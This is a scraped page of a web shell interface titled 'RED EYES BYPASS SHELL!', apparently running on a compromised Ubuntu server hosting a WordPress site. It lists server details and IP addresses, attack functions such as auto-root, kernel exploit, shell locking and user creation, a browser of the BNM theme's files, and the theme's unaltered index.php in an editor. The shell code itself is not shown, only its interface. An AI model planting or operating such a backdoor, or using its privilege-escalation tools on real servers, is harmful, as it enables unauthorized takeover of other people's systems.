Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
bnm /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
css
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
1.72
KB
-rwxr-xr-x
LICENSE
17.62
KB
-rwxr-xr-x
archive.php
1.86
KB
-rwxr-xr-x
comments.php
2.07
KB
-rwxr-xr-x
footer.php
2.82
KB
-rwxr-xr-x
functions.php
12.41
KB
-rwxr-xr-x
header.php
4.01
KB
-rwxr-xr-x
index.php
2.21
KB
-rwxr-xr-x
page.php
1.08
KB
-rwxr-xr-x
readme.txt
4.54
KB
-rwxr-xr-x
screenshot.jpg
260.21
KB
-rwxr-xr-x
search.php
1.78
KB
-rwxr-xr-x
sidebar.php
507
B
-rwxr-xr-x
single.php
943
B
-rwxr-xr-x
style-rtl.css
58.84
KB
-rwxr-xr-x
style.css
58.9
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php /** * The main template file * * This is the most generic template file in a WordPress theme * and one of the two required files for a theme (the other being style.css). * It is used to display a page when nothing more specific matches a query. * E.g., it puts together the home page when no home.php file exists. * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/ * * @package BNM */ get_header(); ?> <main id="primary" class="site-main"> <?php if ( is_home() && is_front_page() && ! is_paged() && is_active_sidebar( 'bnm-magazine-1' ) ) : ?> <div class="bnm-magazine-beside-sb"> <?php dynamic_sidebar( 'bnm-magazine-1' ); ?> </div> <?php endif; /** * Before Main Content Hook */ do_action( 'bnm_before_main_content' ); if ( have_posts() ) : if ( is_home() && ! is_front_page() ) : ?> <header> <h1 class="page-title screen-reader-text"><?php single_post_title(); ?></h1> </header> <?php endif; /** * Before blog entries hook. * @since 1.0.7 */ do_action( 'bnm_before_blog_entries' ); ?> <div id="blog-entries"> <?php /** * Before index loop hook */ do_action( 'bnm_before_loop', 'index' ); /* Start the Loop */ while ( have_posts() ) : the_post(); /* * Include the Post-Type-specific template for the content. * If you want to override this in a child theme, then include a file * called content-___.php (where ___ is the Post Type name) and that will be used instead. */ get_template_part( 'template-parts/content', get_post_type() ); endwhile; /** * After index loop hook */ do_action( 'bnm_after_loop', 'index' ); ?> </div><!-- #blog-entries --> <?php bnm_posts_pagination(); else : get_template_part( 'template-parts/content', 'none' ); endif; /** * After Main Content Hook */ do_action( 'bnm_after_main_content' ); ?> </main><!-- #main --> <?php $bnm_archive_layout = get_theme_mod( 'bnm_archive_layout', 'right-sidebar' ); if ( 'right-sidebar' === $bnm_archive_layout || 'left-sidebar' === $bnm_archive_layout ) { get_sidebar(); } get_footer();
Close